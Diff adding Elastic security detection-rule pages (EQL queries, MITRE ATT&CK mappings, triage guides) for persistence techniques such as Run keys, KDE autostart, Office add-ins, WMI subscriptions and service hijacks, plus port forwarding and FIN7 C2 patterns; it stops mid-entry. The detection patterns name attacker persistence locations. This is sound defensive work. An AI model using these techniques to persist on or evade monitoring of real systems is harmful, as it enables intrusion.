"\\REGISTRY\\MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", + "\\REGISTRY\\USER\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", + "\\REGISTRY\\MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", + "\\REGISTRY\\MACHINE\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\", + "\\REGISTRY\\USER\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", + "\\REGISTRY\\MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ +* Sub-technique: +** Name: Registry Run Keys / Startup Folder +** ID: T1547.001 +** Reference URL: https://attack.mitre.org/techniques/T1547/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-kde-autostart-script-or-desktop-file-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-kde-autostart-script-or-desktop-file-modification.asciidoc new file mode 100644 index 0000000000..530fd2c8cf --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-kde-autostart-script-or-desktop-file-modification.asciidoc 
@@ -0,0 +1,80 @@ +[[prebuilt-rule-8-10-5-persistence-via-kde-autostart-script-or-desktop-file-modification]] +=== Persistence via KDE AutoStart Script or Desktop File Modification + +Identifies the creation or modification of a K Desktop Environment (KDE) AutoStart script or desktop file that will execute upon each user logon. Adversaries may abuse this method for persistence. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://userbase.kde.org/System_Settings/Autostart +* https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/ +* https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.type != "deletion" and + file.extension in ("sh", "desktop") and + file.path : + ( + "/home/*/.config/autostart/*", "/root/.config/autostart/*", + "/home/*/.kde/Autostart/*", "/root/.kde/Autostart/*", + "/home/*/.kde4/Autostart/*", "/root/.kde4/Autostart/*", + "/home/*/.kde/share/autostart/*", "/root/.kde/share/autostart/*", + "/home/*/.kde4/share/autostart/*", "/root/.kde4/share/autostart/*", + "/home/*/.local/share/autostart/*", "/root/.local/share/autostart/*", + "/home/*/.config/autostart-scripts/*", "/root/.config/autostart-scripts/*", + "/etc/xdg/autostart/*", 
"/usr/share/autostart/*" + ) and + not process.name in ("yum", "dpkg", "install", "dnf", "teams", "yum-cron", "dnf-automatic", "docker", "dockerd", + "rpm") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Boot or Logon Autostart Execution +** ID: T1547 +** Reference URL: https://attack.mitre.org/techniques/T1547/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-microsoft-office-addins.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-microsoft-office-addins.asciidoc new file mode 100644 index 0000000000..33dc3d5633 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-microsoft-office-addins.asciidoc 
@@ -0,0 +1,84 @@ +[[prebuilt-rule-8-10-5-persistence-via-microsoft-office-addins]] +=== Persistence via Microsoft Office AddIns + +Detects attempts to establish persistence on an endpoint by abusing Microsoft Office add-ins. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type != "deletion" and + file.extension : ("wll","xll","ppa","ppam","xla","xlam") and + file.path : + ( + "C:\\Users\\*\\AppData\\Roaming\\Microsoft\\Word\\Startup\\*", + "C:\\Users\\*\\AppData\\Roaming\\Microsoft\\AddIns\\*", + "C:\\Users\\*\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Office Application Startup +** ID: T1137 +** Reference URL: https://attack.mitre.org/techniques/T1137/ +* Sub-technique: +** Name: Add-ins +** ID: T1137.006 +** Reference URL: https://attack.mitre.org/techniques/T1137/006/ 
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-powershell-profile.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-powershell-profile.asciidoc new file mode 100644 index 0000000000..018a9b1073 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-powershell-profile.asciidoc 
@@ -0,0 +1,87 @@ +[[prebuilt-rule-8-10-5-persistence-via-powershell-profile]] +=== Persistence via PowerShell profile + +Identifies the creation or modification of a PowerShell profile. PowerShell profile is a script that is executed when PowerShell starts to customize the user environment, which can be abused by attackers to persist in a environment where PowerShell is common. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles +* https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Privilege Escalation +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type != "deletion" and + file.path : ("?:\\Users\\*\\Documents\\WindowsPowerShell\\*", + "?:\\Users\\*\\Documents\\PowerShell\\*", + "?:\\Windows\\System32\\WindowsPowerShell\\*") and + file.name : ("profile.ps1", "Microsoft.Powershell_profile.ps1") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: PowerShell Profile +** ID: T1546.013 +** Reference URL: 
https://attack.mitre.org/techniques/T1546/013/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: PowerShell Profile +** ID: T1546.013 +** Reference URL: https://attack.mitre.org/techniques/T1546/013/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-telemetrycontroller-scheduled-task-hijack.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-telemetrycontroller-scheduled-task-hijack.asciidoc new file mode 100644 index 0000000000..49ccfdff06 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-telemetrycontroller-scheduled-task-hijack.asciidoc 
@@ -0,0 +1,105 @@ +[[prebuilt-rule-8-10-5-persistence-via-telemetrycontroller-scheduled-task-hijack]] +=== Persistence via TelemetryController Scheduled Task Hijack + +Detects the successful hijack of Microsoft Compatibility Appraiser scheduled task to establish persistence with an integrity level of system. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Privilege Escalation +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.name : "CompatTelRunner.exe" and process.args : "-cv*" and + not process.name : ("conhost.exe", + "DeviceCensus.exe", + "CompatTelRunner.exe", + "DismHost.exe", + "rundll32.exe", + "powershell.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Technique: +** Name: Hijack 
Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-update-orchestrator-service-hijack.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-update-orchestrator-service-hijack.asciidoc new file mode 100644 index 0000000000..6a936ebb1e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-update-orchestrator-service-hijack.asciidoc 
@@ -0,0 +1,158 @@ +[[prebuilt-rule-8-10-5-persistence-via-update-orchestrator-service-hijack]] +=== Persistence via Update Orchestrator Service Hijack + +Identifies potential hijacking of the Microsoft Update Orchestrator Service to establish persistence with an integrity level of SYSTEM. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/irsl/CVE-2020-1313 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Privilege Escalation +* Use Case: Vulnerability +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Persistence via Update Orchestrator Service Hijack + +Windows Update Orchestrator Service is a DCOM service used by other components to install Windows updates that are already downloaded. Windows Update Orchestrator Service was vulnerable to elevation of privileges (any user to local system) due to an improper authorization of the callers. The vulnerability affected the Windows 10 and Windows Server Core products. Fixed by Microsoft on Patch Tuesday June 2020. + +This rule will detect uncommon processes spawned by `svchost.exe` with `UsoSvc` as the command line parameters. Attackers can leverage this technique to elevate privileges or maintain persistence. 
+ +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. 
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). 
+ - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.parent.executable : "C:\\Windows\\System32\\svchost.exe" and + process.parent.args : "UsoSvc" and + not process.executable : + ("?:\\ProgramData\\Microsoft\\Windows\\UUS\\Packages\\*\\amd64\\MoUsoCoreWorker.exe", + "?:\\Windows\\System32\\UsoClient.exe", + "?:\\Windows\\System32\\MusNotification.exe", + "?:\\Windows\\System32\\MusNotificationUx.exe", + "?:\\Windows\\System32\\MusNotifyIcon.exe", + "?:\\Windows\\System32\\WerFault.exe", + "?:\\Windows\\System32\\WerMgr.exe", + "?:\\Windows\\UUS\\amd64\\MoUsoCoreWorker.exe", + "?:\\Windows\\System32\\MoUsoCoreWorker.exe", + "?:\\Windows\\UUS\\amd64\\UsoCoreWorker.exe", + "?:\\Windows\\System32\\UsoCoreWorker.exe", + "?:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe") and + not process.name : ("MoUsoCoreWorker.exe", "OfficeC2RClient.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* 
Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Sub-technique: +** Name: Windows Service +** ID: T1543.003 +** Reference URL: https://attack.mitre.org/techniques/T1543/003/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-wmi-event-subscription.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-wmi-event-subscription.asciidoc new file mode 100644 index 0000000000..472e191c69 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-wmi-event-subscription.asciidoc 
@@ -0,0 +1,89 @@ +[[prebuilt-rule-8-10-5-persistence-via-wmi-event-subscription]] +=== Persistence via WMI Event Subscription + +An adversary can use Windows Management Instrumentation (WMI) to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + (process.name : "wmic.exe" or process.pe.original_file_name == "wmic.exe") and + process.args : "create" and + process.args : ("ActiveScriptEventConsumer", "CommandLineEventConsumer") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: 
Windows Management Instrumentation Event Subscription +** ID: T1546.003 +** Reference URL: https://attack.mitre.org/techniques/T1546/003/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Windows Management Instrumentation +** ID: T1047 +** Reference URL: https://attack.mitre.org/techniques/T1047/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-port-forwarding-rule-addition.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-port-forwarding-rule-addition.asciidoc new file mode 100644 index 0000000000..a8e5af58b6 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-port-forwarding-rule-addition.asciidoc 
@@ -0,0 +1,125 @@ +[[prebuilt-rule-8-10-5-port-forwarding-rule-addition]] +=== Port Forwarding Rule Addition + +Identifies the creation of a new port forwarding rule. An adversary may abuse this technique to bypass network segmentation restrictions. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Port Forwarding Rule Addition + +Network port forwarding is a mechanism to redirect incoming TCP connections (IPv4 or IPv6) from the local TCP port to any other port number, or even to a port on a remote computer. + +Attackers may configure port forwarding rules to bypass network segmentation restrictions, using the host as a jump box to access previously unreachable systems. + +This rule monitors the modifications to the `HKLM\SYSTEM\*ControlSet*\Services\PortProxy\v4tov4\` subkeys. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. 
+- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account and system owners and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Identify the target host IP address, check the connections originating from the host where the modification occurred, and inspect the credentials used. + - Investigate suspicious login activity, such as unauthorized access and logins from outside working hours and unusual locations. + +### False positive analysis + +- This mechanism can be used legitimately. Analysts can dismiss the alert if the Administrator is aware of the activity and there are justifications for this configuration. +- If this rule is noisy in your environment due to expected activity, consider adding exceptions — preferably with a combination of user and command line conditions. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Delete the port forwarding rule. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. 
+- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and registry.path : ( + "HKLM\\SYSTEM\\*ControlSet*\\Services\\PortProxy\\v4tov4\\*", + "\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Services\\PortProxy\\v4tov4\\*" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Protocol Tunneling +** ID: T1572 +** Reference URL: https://attack.mitre.org/techniques/T1572/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-possible-fin7-dga-command-and-control-behavior.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-possible-fin7-dga-command-and-control-behavior.asciidoc new file mode 100644 index 0000000000..9c34e4d98d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-possible-fin7-dga-command-and-control-behavior.asciidoc 
@@ -0,0 +1,82 @@ +[[prebuilt-rule-8-10-5-possible-fin7-dga-command-and-control-behavior]] +=== Possible FIN7 DGA Command and Control Behavior + +This rule detects a known command and control pattern in network events. The FIN7 threat group is known to use this command and control technique, while maintaining persistence in their target's network. + +*Rule type*: query + +*Rule indices*: + +* packetbeat-* +* auditbeat-* +* filebeat-* +* logs-network_traffic.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html + +*Tags*: + +* Use Case: Threat Detection +* Tactic: Command and Control +* Domain: Endpoint + +*Version*: 104 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +In the event this rule identifies benign domains in your environment, the `destination.domain` field in the rule can be modified to include those domains. Example: `...AND NOT destination.domain:(zoom.us OR benign.domain1 OR benign.domain2)`. 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +(event.dataset: (network_traffic.tls OR network_traffic.http) or + (event.category: (network OR network_traffic) AND type: (tls OR http) AND network.transport: tcp)) AND +destination.domain:/[a-zA-Z]{4,5}\.(pw|us|club|info|site|top)/ AND NOT destination.domain:zoom.us + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ +* Sub-technique: +** Name: Domain Generation Algorithms +** ID: T1568.002 +** Reference URL: https://attack.mitre.org/techniques/T1568/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-code-execution-via-postgresql.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-code-execution-via-postgresql.asciidoc new file mode 100644 index 0000000000..2deb05c24e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-code-execution-via-postgresql.asciidoc 
@@ -0,0 +1,69 @@ +[[prebuilt-rule-8-10-5-potential-code-execution-via-postgresql]] +=== Potential Code Execution via Postgresql + +This rule monitors for suspicious activities that may indicate an attacker attempting to execute arbitrary code within a PostgreSQL environment. Attackers can execute code via PostgreSQL as a result of gaining unauthorized access to a public facing PostgreSQL database or exploiting vulnerabilities, such as remote command execution and SQL injection attacks, which can result in unauthorized access and malicious actions, and facilitate post-exploitation activities for unauthorized access and malicious actions. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: 